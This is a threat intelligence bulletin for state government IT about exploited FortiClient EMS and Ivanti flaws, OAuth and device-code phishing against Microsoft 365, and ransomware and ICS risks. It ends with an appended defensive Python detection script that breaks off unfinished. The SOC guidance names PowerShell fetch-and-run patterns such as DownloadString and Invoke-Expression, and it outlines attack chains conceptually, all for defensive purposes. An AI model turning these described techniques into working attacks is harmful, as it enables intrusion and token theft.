Public Sector
Anomali Cyber Watch

When Your Identity Platform Becomes the Front Door: Critical Threats Facing State Government IT

Published on April 6, 2026
<p><strong>Threat Assessment Level: ELEVATED &mdash; Trending HIGH</strong></p> <p><em>Changed from ELEVATED (stable) in the prior cycle to ELEVATED &mdash; Trending HIGH based on: (1) a second actively exploited critical vulnerability in FortiClient EMS within weeks, (2) three independent attack campaigns converging on Microsoft 365 identity flows, and (3) continued nation-state targeting of government networks by Chinese and North Korean actors.</em></p> <p>State government IT leaders face a threat environment this week that demands immediate attention on two fronts: <strong>perimeter appliance exploitation</strong> that continues to accelerate, and a <strong>fundamental shift in how attackers gain access</strong> &mdash; away from traditional network exploitation and toward abuse of legitimate cloud authentication mechanisms.</p> <p>This is not a theoretical warning. As of this writing, a critical Fortinet vulnerability is being exploited in the wild, a Chinese espionage group is using Microsoft's own OAuth consent flows to compromise government organizations, and a phishing-as-a-service platform has deployed over 1,000 domains targeting the device-code authentication that many state agencies rely on for shared kiosks and field devices.</p> <p>The common thread: <strong>your identity platform is now the perimeter</strong>, and it requires the same defensive rigor you apply to firewalls and VPN concentrators.</p> <h2><strong>What Changed This Week</strong></h2> <p>The past seven days brought a convergence of threats that individually would warrant attention and collectively demand coordinated action:</p> <ul> <li><strong>FortiClient EMS CVE-2026-35616 (CVSS 9.8)</strong> &mdash; A new critical improper access control vulnerability, confirmed actively exploited in the wild, affecting FortiClient EMS versions 7.4.5&ndash;7.4.6. 
This is the <strong>second</strong> critical FortiClient EMS vulnerability in recent weeks (following CVE-2026-21643, a SQL injection flaw). Unauthenticated attackers can achieve full server compromise.</li> <li><strong>TA416 / Mustang Panda resumes government espionage</strong> &mdash; This China-linked group is actively targeting government organizations using OAuth consent phishing and the PlugX backdoor. Traditional email security controls will not catch this &mdash; the attack abuses legitimate Microsoft authentication flows.</li> <li><strong>EvilTokens PhaaS goes live at scale; Tycoon 2FA pivots to new infrastructure</strong> &mdash; A new phishing-as-a-service platform has deployed 1,000+ domains targeting device-code and OAuth consent flows in Microsoft 365. It converts stolen tokens into Primary Refresh Tokens (PRTs), enabling persistent access that <strong>survives password resets</strong>. Separately, Tycoon 2FA operators pivoted to new proxy infrastructure following a recent takedown, demonstrating continued operational resilience.</li> <li><strong>Ivanti EPMM exploitation expands</strong> &mdash; A new campaign (distinct from earlier activity) is exploiting CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8, both in CISA's Known Exploited Vulnerabilities catalog) against government targets.</li> <li><strong>Three CISA ICS advisories</strong> affecting Siemens SICAM, Yokogawa CENTUM VP, and Hitachi Energy Ellipse &mdash; all systems found in state utility and facilities management environments.</li> <li><strong>Ransomware surge against government targets</strong> &mdash; DragonForce, Akira, Qilin, and NightSpire all posted new victims within a 72-hour window (April 2&ndash;4), all groups with confirmed state and local government targeting profiles. 
The operational tempo shows no sign of decreasing.</li> <li><strong>Kimsuky updates attack chain</strong> &mdash; The North Korean espionage group has refreshed its delivery chain (LNK&rarr;XML&rarr;VBS&rarr;PS1&rarr;Python backdoor) with Dropbox-based command-and-control staging, actively targeting government, construction, and telecom sectors.</li> <li><strong>Iranian retaliatory operations active</strong> &mdash; Following a DOJ seizure of Iranian cyber infrastructure on March 19, APT42, CyberAv3ngers, MuddyWater, and Handala/Void Manticore have initiated retaliatory operations, with pre-positioning in U.S. critical infrastructure confirmed.</li> </ul> <h2><strong>Threat Timeline</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Severity</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>Mar 19, 2026</strong></p> </td> <td> <p>DOJ seizure of Iranian cyber infrastructure triggers retaliatory operations by APT42, CyberAv3ngers, MuddyWater, and Handala/Void Manticore; pre-positioning in U.S. 
critical infrastructure confirmed</p> </td> <td> <p>CRITICAL</p> </td> </tr> <tr> <td> <p><strong>Apr 1&ndash;2, 2026</strong></p> </td> <td> <p>CISA adds CVE-2026-1281 (Ivanti EPMM) to Known Exploited Vulnerabilities catalog; three ICS advisories published for Siemens SICAM, Yokogawa CENTUM VP, Hitachi Energy Ellipse</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 2&ndash;4, 2026</strong></p> </td> <td> <p>DragonForce, Akira, Qilin, and NightSpire ransomware groups all post new victims within 72-hour window &mdash; all with confirmed government targeting profiles</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 3&ndash;4, 2026</strong></p> </td> <td> <p>TA416 (Mustang Panda) campaign targeting government organizations with OAuth phishing and PlugX reported by multiple sources</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 4, 2026</strong></p> </td> <td> <p>Ivanti EPMM exploitation escalates to four distinct campaigns including MISTBRICK malware; Cisco SD-WAN CVE-2026-20127 (CVSS 10.0) confirmed under active government-exclusive exploitation</p> </td> <td> <p>CRITICAL</p> </td> </tr> <tr> <td> <p><strong>Apr 5, 2026</strong></p> </td> <td> <p>Kimsuky updates attack chain with Python backdoor and Dropbox staging; Tycoon 2FA pivots to new infrastructure after takedown; DeepLoad ClickFix fileless campaign reported</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 6, 2026</strong></p> </td> <td> <p>FortiClient EMS CVE-2026-35616 (CVSS 9.8) confirmed actively exploited in the wild; EvilTokens PhaaS platform identified with 1,000+ phishing domains targeting M365 device-code flows</p> </td> <td> <p>CRITICAL</p> </td> </tr> </tbody> </table> <h2><strong>Critical Vulnerability Alert: FortiClient EMS Under Dual Exploitation</strong></h2> <p>State agencies running Fortinet's FortiClient Enterprise Management Server face an unprecedented situation: <strong>two distinct critical vulnerabilities in the same product, 
both actively exploited, within weeks of each other.</strong></p> <table> <thead> <tr> <th> <p>CVE</p> </th> <th> <p>CVSS</p> </th> <th> <p>Attack Vector</p> </th> <th> <p>Affected Versions</p> </th> <th> <p>Status</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CVE-2026-35616</strong></p> </td> <td> <p>9.8</p> </td> <td> <p>Improper access control &mdash; unauthenticated RCE via crafted requests</p> </td> <td> <p>7.4.5 &ndash; 7.4.6</p> </td> <td> <p><strong>Actively exploited</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-21643</strong></p> </td> <td> <p>9.8</p> </td> <td> <p>SQL injection &mdash; unauthenticated RCE</p> </td> <td> <p>Earlier versions</p> </td> <td> <p><strong>Actively exploited</strong></p> </td> </tr> </tbody> </table> <p>Two critical vulnerabilities with different root causes in the same product in rapid succession suggest systemic code quality concerns. <strong>State CISOs should not only patch immediately but begin evaluating whether FortiClient EMS remains an acceptable risk</strong> for endpoint management, or whether migration planning should begin.</p> <p><strong>ATT&amp;CK Techniques:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter)</p> <h2><strong>The Identity Perimeter: Three Converging Threats to Microsoft 365</strong></h2> <p>The most strategically significant development this week is the convergence of <strong>three independent attack campaigns</strong> all targeting Microsoft 365 identity and authentication flows. This is not a coincidence &mdash; it reflects a fundamental shift in attacker tradecraft.</p> <h3><strong>1. TA416 / Mustang Panda &mdash; Nation-State OAuth Espionage</strong></h3> <p><strong>Actor:</strong> TA416 (aliases: Mustang Panda, RedDelta, BRONZE PRESIDENT, STATELY TAURUS) &mdash; China-linked<br><strong>Target:</strong> Government and diplomatic organizations<br><strong>Technique:</strong> OAuth consent phishing to gain initial access to M365 tenants, followed by DLL sideloading to deploy the <strong>PlugX</strong> backdoor, with Dropbox used for staging</p> <p>This campaign uses web-bug reconnaissance emails to identify active targets before delivering the phishing payload. Because it abuses legitimate Microsoft OAuth consent flows, <strong>traditional email filtering and URL reputation services will not detect it.</strong></p> <p><strong>ATT&amp;CK Techniques:</strong> T1566.001/002 (Spearphishing), T1528 (Steal Application Access Token), T1574.002 (DLL Side-Loading), T1102 (Web Service &mdash; Dropbox)</p> <h3><strong>2. EvilTokens &mdash; Commoditized Token Theft at Scale</strong></h3> <p><strong>Actor:</strong> Criminal (PhaaS operator)<br><strong>Scale:</strong> 1,000+ phishing domains deployed<br><strong>Technique:</strong> Device-code and OAuth phishing with Primary Refresh Token (PRT) conversion</p> <p>EvilTokens is particularly dangerous for state government because:</p> <ul> <li>Many agencies use device-code authentication for shared kiosks, field devices, and conference room systems</li> <li>PRT theft enables persistent access that <strong>survives password resets and MFA re-enrollment</strong></li> <li>Conditional Access policies in many state tenants do not explicitly block device-code flows</li> </ul> <h3><strong>3. Tycoon 2FA &mdash; Resilient MFA Bypass Infrastructure</strong></h3> <p><strong>Actor:</strong> Criminal (PhaaS operator)<br><strong>Technique:</strong> Real-time WebSocket-based MFA capture with proxy infrastructure</p> <p>After a recent takedown, Tycoon 2FA operators pivoted to new proxy infrastructure and ASNs, demonstrating operational resilience. The platform captures MFA tokens in real time, defeating time-based one-time passwords.</p> <p><strong>ATT&amp;CK Techniques:</strong> T1111 (Multi-Factor Authentication Interception), T1539 (Steal Web Session Cookie)</p> <p><strong>The strategic implication is clear:</strong> Your Azure AD Conditional Access configuration is now your primary defensive control against initial access &mdash; not your firewall, not your email gateway. It needs the same rigor, review cadence, and change management as firewall rule sets.</p> <h2><strong>Nation-State Activity: What's Active and What's Notably Absent</strong></h2> <h3><strong>Active Campaigns Targeting Government</strong></h3> <table> <thead> <tr> <th> <p>Actor</p> </th> <th> <p>Origin</p> </th> <th> <p>Current Activity</p> </th> <th> <p>Target</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>TA416 / Mustang Panda</strong></p> </td> <td> <p>China</p> </td> <td> <p>OAuth consent phishing + PlugX deployment</p> </td> <td> <p>Government, diplomatic</p> </td> </tr> <tr> <td> <p><strong>Kimsuky</strong></p> </td> <td> <p>North Korea (DPRK)</p> </td> <td> <p>Updated LNK&rarr;XML&rarr;VBS&rarr;PS1 chain delivering Python backdoor with Dropbox C2</p> </td> <td> <p>Government, construction, telecom</p> </td> </tr> <tr> <td> <p><strong>APT42</strong></p> </td> <td> <p>Iran (IRGC-IO)</p> </td> <td> <p>Retaliatory operations following DOJ infrastructure seizure</p> </td> <td> <p>U.S. critical infrastructure</p> </td> </tr> <tr> <td> <p><strong>CyberAv3ngers</strong></p> </td> <td> <p>Iran (IRGC)</p> </td> <td> <p>Pre-positioning in U.S. 
critical infrastructure</p> </td> <td> <p>Water, energy</p> </td> </tr> <tr> <td> <p><strong>MuddyWater / Seedworm</strong></p> </td> <td> <p>Iran (MOIS)</p> </td> <td> <p>Active operations</p> </td> <td> <p>Government</p> </td> </tr> <tr> <td> <p><strong>APT28 / Fancy Bear</strong></p> </td> <td> <p>Russia</p> </td> <td> <p>Active IOCs in intelligence feeds</p> </td> <td> <p>Government</p> </td> </tr> <tr> <td> <p><strong>APT41</strong></p> </td> <td> <p>China</p> </td> <td> <p>Tracked activity</p> </td> <td> <p>Government, multiple sectors</p> </td> </tr> </tbody> </table> <h3><strong>Notable Absences</strong></h3> <p><strong>Volt Typhoon and Salt Typhoon</strong> &mdash; the Chinese APTs previously considered the most prominent nation-state threat to U.S. government infrastructure &mdash; produced <strong>zero indicators this cycle.</strong> Combined with the emergence of TA416 diplomatic espionage activity, this may signal a strategic pivot in Chinese cyber operations from destructive pre-positioning to intelligence collection. This does not reduce the threat level &mdash; it changes what you need to detect, shifting the focus from network anomaly detection to identity and authentication monitoring.</p> <p><strong>LockBit</strong> &mdash; no direct activity observed. The last Anomali ThreatStream Next-Gen update was December 2025. Law enforcement disruption appears to have lasting effects, but successor groups (DragonForce, NightSpire, Qilin) have absorbed the operational tempo.</p> <h2><strong>Ransomware: The SLTT Targeting Continues</strong></h2> <p>The ransomware threat to state and local government remains acute. 
Within a 72-hour window (April 2&ndash;4), <strong>DragonForce, Akira, Qilin, and NightSpire</strong> all posted new victims &mdash; all groups with confirmed government targeting profiles.</p> <p>State and local government continues to be viewed by ransomware operators as a <strong>high-yield, low-defense target environment.</strong> The summer of 2025 was described by multiple sources as "one of the most devastating periods for municipal cybersecurity in U.S. history," and the operational tempo has not decreased.</p> <p>Key ransomware-adjacent developments this cycle:</p> <ul> <li><strong>Yurei ransomware toolkit</strong> exposure reported in weekly threat recap</li> <li><strong>DPRK modular malware</strong> with ransomware capabilities continues to evolve</li> <li><strong>Phorpiex botnet</strong> continues delivering LockBit Black payloads (the primary remaining LockBit-adjacent threat)</li> </ul> <h2><strong>ICS/OT: Advisories Affecting State Utility Infrastructure</strong></h2> <p>Three CISA ICS advisories published this week affect systems commonly found in state government utility and facilities management environments:</p> <table> <thead> <tr> <th> <p>Advisory</p> </th> <th> <p>Product</p> </th> <th> <p>Impact</p> </th> <th> <p>Relevance to State Gov</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>ICSA-26-092-01</strong></p> </td> <td> <p>Siemens SICAM 8</p> </td> <td> <p>Denial of service in power grid protection/automation</p> </td> <td> <p>State utility partners</p> </td> </tr> <tr> <td> <p><strong>ICSA-26-092-02</strong></p> </td> <td> <p>Yokogawa CENTUM VP</p> </td> <td> <p>Unauthorized login and permission modification in DCS</p> </td> <td> <p>Water treatment, power generation</p> </td> </tr> <tr> <td> <p><strong>ICSA-26-092-03</strong></p> </td> <td> <p>Hitachi Energy Ellipse</p> </td> <td> <p>Jasper Report vulnerability in enterprise asset management</p> </td> <td> <p>Utility maintenance management</p> </td> </tr> </tbody> </table> 
<p>Intelligence reporting also notes that <strong>thousands of internet-exposed ICS/OT devices are being actively scanned.</strong> State agencies with OT environments &mdash; particularly water/wastewater utilities and building management systems &mdash; should verify that no ICS devices are directly internet-accessible.</p> <h2><strong>Predictive Analysis: What Comes Next</strong></h2> <table> <thead> <tr> <th> <p>Prediction</p> </th> <th> <p>Probability</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional exploitation of FortiClient EMS CVE-2026-35616 as PoC code circulates; CISA KEV addition within 48 hours</p> </td> <td> <p><strong>HIGH (&gt;75%)</strong></p> </td> <td> <p>Active exploitation confirmed; vendor advisory published; pattern matches prior CVE-2026-21643 trajectory</p> </td> </tr> <tr> <td> <p>TA416 / Mustang Panda campaign expands beyond European targets to include U.S. state/local government</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Historical Mustang Panda targeting patterns include U.S. government; OAuth technique is geography-agnostic</p> </td> </tr> <tr> <td> <p>EvilTokens or Tycoon 2FA infrastructure used in credential theft campaign specifically targeting government M365 tenants during spring tax season</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Tax season phishing historically peaks in April; PhaaS platforms lower the barrier to targeted campaigns</p> </td> </tr> <tr> <td> <p>Ransomware group posts a U.S. 
state or local government victim within 14 days</p> </td> <td> <p><strong>HIGH (&gt;75%)</strong></p> </td> <td> <p>Four groups posted victims in 72-hour window; SLTT targeting profile confirmed across all four</p> </td> </tr> <tr> <td> <p>Iranian retaliatory cyber operations escalate following DOJ infrastructure seizure</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Historical pattern of escalation following law enforcement action; multiple IRGC-affiliated groups already active</p> </td> </tr> </tbody> </table> <h2><strong>SOC Operational Guidance</strong></h2> <h3><strong>Detection Priorities</strong></h3> <ol> <li><strong>Microsoft 365 OAuth and Device-Code Abuse (CRITICAL)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1528 (Steal Application Access Token), T1539 (Steal Web Session Cookie), T1078.004 (Valid Accounts: Cloud)</li> <li><strong>Hunt Hypothesis:</strong> Adversaries are using OAuth consent phishing and device-code flows to obtain persistent access tokens to state M365 tenants. Look for anomalous consent grants and device-code authentications from unexpected locations.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>M365 Unified Audit Log: Operation: Consent to application &mdash; alert on any new OAuth consent grants, especially from non-admin users</li> <li>Azure AD Sign-in Logs: filter for authenticationProtocol: deviceCode &mdash; baseline normal device-code usage and alert on deviations</li> <li>Azure AD Audit Logs: new Service Principal creation or credential additions (T1098.001)</li> <li>Impossible travel or anomalous location for token-based authentications</li> </ul> <ul> <li><strong>Detection Rule:</strong> Alert when Consent to application is followed by Add service principal credentials within 24 hours from the same user or IP</li> </ul> <ol start="2"> <li><strong>FortiClient EMS Exploitation (CRITICAL)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter)</li> <li><strong>Hunt Hypothesis:</strong> Attackers are sending crafted requests to FortiClient EMS servers to achieve unauthenticated code execution. Compromised EMS servers may be used as pivot points into the managed endpoint fleet.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>FortiClient EMS server access logs for anomalous or malformed HTTP requests</li> <li>Unexpected child processes spawned by EMS service processes</li> <li>Outbound connections from EMS servers to unknown external IPs</li> <li>Any new scheduled tasks or services created on EMS servers</li> </ul> <ol start="3"> <li><strong>PlugX / DLL Sideloading (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1574.002 (DLL Side-Loading), T1204.002 (Malicious File)</li> <li><strong>Hunt Hypothesis:</strong> TA416 delivers PlugX via legitimate executables that sideload malicious DLLs from ZIP/LNK delivery chains.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>Execution of LNK files extracted from ZIP archives (especially from email)</li> <li>Known-good executables loading DLLs from unusual paths (e.g., %TEMP%, %APPDATA%)</li> <li>Outbound HTTPS connections to Dropbox API endpoints from non-browser processes</li> <li>Sysmon Event ID 7 (Image Loaded) for DLLs loaded from user-writable directories by signed executables</li> </ul> <ol start="4"> <li><strong>PowerShell and Fileless Execution Chains (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1059.001 (PowerShell), T1059.006 (Python), T1047 (WMI), T1055 (Process Injection)</li> <li><strong>Hunt Hypothesis:</strong> Kimsuky's updated chain (LNK&rarr;XML&rarr;VBS&rarr;PS1&rarr;Python) and DeepLoad ClickFix both rely on PowerShell for initial execution and in-memory payload delivery.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>PowerShell Script Block Logging (Event ID 4104) for encoded commands, Invoke-Expression, DownloadString, and Base64 patterns</li> <li>WMI event subscriptions (T1546.003) for persistence</li> <li>Python process execution from non-standard paths</li> <li>USB device insertion events correlated with subsequent script execution (DeepLoad uses USB persistence via T1091)</li> </ul> <ol start="5"> <li><strong>Ivanti EPMM Exploitation (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1190 (Exploit Public-Facing Application)</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>Ivanti EPMM server logs for unauthenticated API calls or code injection patterns</li> <li>Unexpected outbound connections from EPMM servers</li> <li>New mobile device enrollments or policy changes not initiated by administrators</li> </ul> <h2><strong>Sector-Specific Defensive Priorities</strong></h2> <h3><strong>Government (State and Local Agencies)</strong></h3> <p><strong>Primary threats:</strong> TA416 OAuth espionage, EvilTokens credential theft, ransomware (Qilin, DragonForce, Akira, NightSpire), Kimsuky espionage</p> <ul> <li>Audit all Azure AD Conditional Access policies &mdash; specifically verify that device-code authentication is blocked for all users except those with documented operational need</li> <li>Review OAuth consent settings: set User consent for applications to "Do not allow user consent" or restrict to verified publishers only</li> <li>Ensure all citizen-facing portals (tax, DMV, benefits) have WAF protections and are not running vulnerable Ivanti or Fortinet components</li> <li>Conduct tabletop exercise for ransomware scenario targeting a citizen services agency during peak tax season</li> </ul> <h3><strong>Financial Services</strong></h3> <p><strong>Primary threats:</strong> Ivanti EPMM exploitation (financial services explicitly listed as target), EvilTokens token theft, Tycoon 2FA MFA bypass</p> <ul> <li>Verify Ivanti EPMM patching against CVE-2026-1281 and CVE-2026-1340 &mdash; financial services is an explicitly named target in the latest campaign</li> <li>Implement continuous access evaluation (CAE) for all financial transaction systems accessed via M365 authentication</li> <li>Monitor for anomalous API token usage patterns that could 
indicate PRT theft</li> </ul> <h3><strong>Energy and Utilities</strong></h3> <p><strong>Primary threats:</strong> Iranian APT pre-positioning (CyberAv3ngers, APT42), ICS/OT vulnerabilities (Siemens SICAM, Yokogawa CENTUM VP, Hitachi Ellipse), Volt Typhoon residual risk</p> <ul> <li>Immediately assess exposure to ICSA-26-092-01 (Siemens SICAM), ICSA-26-092-02 (Yokogawa CENTUM VP), and ICSA-26-092-03 (Hitachi Energy Ellipse)</li> <li>Verify network segmentation between IT and OT environments &mdash; no ICS/SCADA devices should be directly internet-accessible</li> <li>Review access controls on CENTUM VP systems &mdash; the Yokogawa advisory specifically addresses unauthorized PROG user login</li> <li>Increase monitoring for Iranian APT indicators given confirmed retaliatory operations following DOJ infrastructure seizure</li> </ul> <h3><strong>Healthcare</strong></h3> <p><strong>Primary threats:</strong> Ransomware (all four active groups target healthcare adjacently), credential theft via EvilTokens/Tycoon 2FA, supply chain compromise</p> <ul> <li>Healthcare agencies managing Medicaid and public health data should prioritize M365 Conditional Access hardening &mdash; stolen tokens provide access to protected health information</li> <li>Ensure backup and recovery procedures are tested for ransomware scenarios &mdash; healthcare data is high-value for both encryption and exfiltration</li> <li>Monitor for PowerShell-based fileless attacks (Kimsuky, DeepLoad) targeting clinical and administrative workstations</li> </ul> <h3><strong>Aviation and Logistics</strong></h3> <p><strong>Primary threats:</strong> TA416/Mustang Panda (transportation explicitly listed in Ivanti campaign targeting), supply chain compromise, nation-state espionage</p> <ul> <li>Transportation agencies are explicitly named targets in the latest Ivanti EPMM exploitation campaign &mdash; verify patching status immediately</li> <li>Monitor for PlugX indicators and DLL sideloading patterns, particularly on 
systems handling logistics and supply chain data</li> <li>Review third-party vendor access to transportation management systems for supply chain risk</li> </ul> <h2><strong>Prioritized Defense Recommendations</strong></h2> <h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Patch FortiClient EMS</strong> against CVE-2026-35616 on ALL instances running versions 7.4.5&ndash;7.4.6. Review EMS server logs for anomalous requests since April 1 to determine if exploitation has already occurred.</p> </td> </tr> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Confirm Ivanti EPMM patching</strong> against CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8, CISA KEV). A new campaign is actively exploiting these against government networks.</p> </td> </tr> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>SOC / Identity Team</p> </td> <td> <p><strong>Block device-code authentication</strong> in Azure AD Conditional Access policies unless explicitly required for documented use cases. Audit existing device-code grants for anomalous registrations.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Enable alerting</strong> on M365 Unified Audit Log for Consent to application events and Azure AD sign-in logs for deviceCode authentication protocol.</p> </td> </tr> </tbody> </table> <h3><strong>7-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC / Identity Team</p> </td> <td> <p><strong>Audit Azure AD Service Principals</strong> for Global Administrator or Privileged Role Administrator role assignments. 
Cross-reference with Application Administrator assignments to identify privilege escalation paths. Remove unnecessary high-privilege assignments.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy TA416/Mustang Panda detection rules:</strong> OAuth consent grant monitoring, LNK-from-ZIP execution alerts, DLL sideloading detection (signed executables loading DLLs from user-writable directories), and Dropbox API connections from non-browser processes.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>IT Operations / OT</p> </td> <td> <p><strong>Coordinate with utility partners</strong> to verify patching for Siemens SICAM 8 (ICSA-26-092-01), Yokogawa CENTUM VP (ICSA-26-092-02), and Hitachi Energy Ellipse (ICSA-26-092-03). Confirm no ICS/OT devices are internet-exposed.</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Implement PowerShell Script Block Logging</strong> (Event ID 4104) and monitor for Kimsuky attack chain indicators: encoded PowerShell, Python execution from non-standard paths, and WMI persistence.</p> </td> </tr> </tbody> </table> <h3><strong>30-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>CISO / Identity Team</p> </td> <td> <p><strong>Commission comprehensive M365 Conditional Access review</strong> addressing EvilTokens, Tycoon 2FA, and TA416 OAuth abuse vectors. 
Evaluate: device-code flow restrictions, token lifetime policies, continuous access evaluation (CAE) enforcement, and user consent settings for applications.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Deploy PowerShell Constrained Language Mode</strong> across all endpoints to limit fileless attack chains (Kimsuky PS1 chains, DeepLoad ClickFix, and similar).</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Evaluate FortiClient EMS risk posture.</strong> Two critical vulnerabilities with different root causes in rapid succession warrant a formal risk assessment of continued use versus migration to an alternative endpoint management platform.</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>CISO / IR Team</p> </td> <td> <p><strong>Conduct ransomware tabletop exercise</strong> simulating a Qilin or DragonForce attack against a citizen-facing agency during peak service demand. Test backup restoration, communication plans, and decision authority for ransom payment.</p> </td> </tr> </tbody> </table> <h2><strong>The Bottom Line</strong></h2> <p>This week's intelligence paints a picture of a threat environment that is shifting beneath our feet. The traditional security model &mdash; patch the firewall, filter the email, monitor the network &mdash; is necessary but no longer sufficient. When nation-state actors like TA416 and commoditized platforms like EvilTokens are both targeting the same Microsoft authentication flows that every state agency depends on, <strong>your identity infrastructure IS your security perimeter.</strong></p> <p>The four critical CVEs demanding immediate patching (CVE-2026-35616, CVE-2026-21643, CVE-2026-1281, CVE-2026-1340) are urgent. 
But the strategic action that will determine your security posture for the next quarter is the Azure AD Conditional Access review. Device-code flows, OAuth consent grants, and token lifetime policies are the controls that stand between your agency's data and the adversaries described in this report.</p> <p>Patch today. Review your identity controls this week. Plan your architecture decisions this month.</p> <p>The adversaries are not waiting.</p>
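<p>The detection rule in the SOC Operational Guidance above (Consent to application followed by Add service principal credentials within 24 hours from the same user or IP) and the device-code baseline item beside it, carried through as an added Python example. This is not code from the Anomali report or from any Microsoft product; the field names (time, operation, user, ip, app, authenticationProtocol, country) and every log record are constructed assumptions standing in for Azure AD audit and sign-in log exports.</p>

```python
"""Identity-log hunts for OAuth consent and device-code abuse.

Added example, not part of the Anomali report or any vendor tooling. It
implements (1) the report's detection rule: "Consent to application" followed
by "Add service principal credentials" within 24 hours, linked by the same
user or the same source IP, and (2) device-code sign-ins that fall outside a
documented per-account baseline. Field names and records are assumptions.
"""
from datetime import datetime, timedelta

CORRELATION_WINDOW = timedelta(hours=24)

# Constructed Azure AD audit log records (assumed field names, not tenant data).
AUDIT_EVENTS = [
    {"time": "2026-04-03T09:12:00", "operation": "Consent to application",
     "user": "jdoe@agency.example", "ip": "203.0.113.10", "app": "Mail Sync Helper"},
    # Credential added from a different IP but by the same user, 6.5 hours later.
    {"time": "2026-04-03T15:40:00", "operation": "Add service principal credentials",
     "user": "jdoe@agency.example", "ip": "198.51.100.7", "app": "Mail Sync Helper"},
    # Admin-approved app: consent and credential add are 72 hours apart, so no alert.
    {"time": "2026-04-01T08:00:00", "operation": "Consent to application",
     "user": "admin@agency.example", "ip": "192.0.2.5", "app": "Approved HR Tool"},
    {"time": "2026-04-04T08:00:00", "operation": "Add service principal credentials",
     "user": "admin@agency.example", "ip": "192.0.2.5", "app": "Approved HR Tool"},
]

# Constructed Azure AD sign-in log records (assumed field names).
SIGNIN_EVENTS = [
    {"time": "2026-04-03T07:55:00", "user": "kiosk01@agency.example",
     "authenticationProtocol": "deviceCode", "country": "US"},
    {"time": "2026-04-03T09:10:00", "user": "jdoe@agency.example",
     "authenticationProtocol": "deviceCode", "country": "NL"},
    {"time": "2026-04-03T09:30:00", "user": "jdoe@agency.example",
     "authenticationProtocol": "none", "country": "US"},
]

# Accounts with a documented operational need for device-code flow and the
# countries they are expected to sign in from (assumed baseline).
DEVICE_CODE_BASELINE = {"kiosk01@agency.example": {"US"}}


def _ts(record):
    return datetime.fromisoformat(record["time"])


def correlate_consent_to_credentials(events, window=CORRELATION_WINDOW):
    """Pair each consent grant with later credential additions inside `window`
    that share the consenting user or the source IP; one alert per pair."""
    consents = [e for e in events if e["operation"] == "Consent to application"]
    cred_adds = [e for e in events if e["operation"] == "Add service principal credentials"]
    alerts = []
    for consent in consents:
        for add in cred_adds:
            delta = _ts(add) - _ts(consent)
            if not (timedelta(0) <= delta <= window):
                continue  # credential add before consent, or outside the window
            if add["user"] == consent["user"] or add["ip"] == consent["ip"]:
                alerts.append({
                    "user": consent["user"], "app": consent["app"],
                    "consent_ip": consent["ip"], "cred_add_ip": add["ip"],
                    "hours_between": round(delta.total_seconds() / 3600, 2),
                })
    return alerts


def flag_device_code_signins(signins, baseline=DEVICE_CODE_BASELINE):
    """Return device-code sign-ins from accounts with no documented need, or
    from a country outside that account's baseline."""
    flagged = []
    for s in signins:
        if s["authenticationProtocol"] != "deviceCode":
            continue
        allowed = baseline.get(s["user"])
        if allowed is None or s["country"] not in allowed:
            flagged.append(s)
    return flagged


if __name__ == "__main__":
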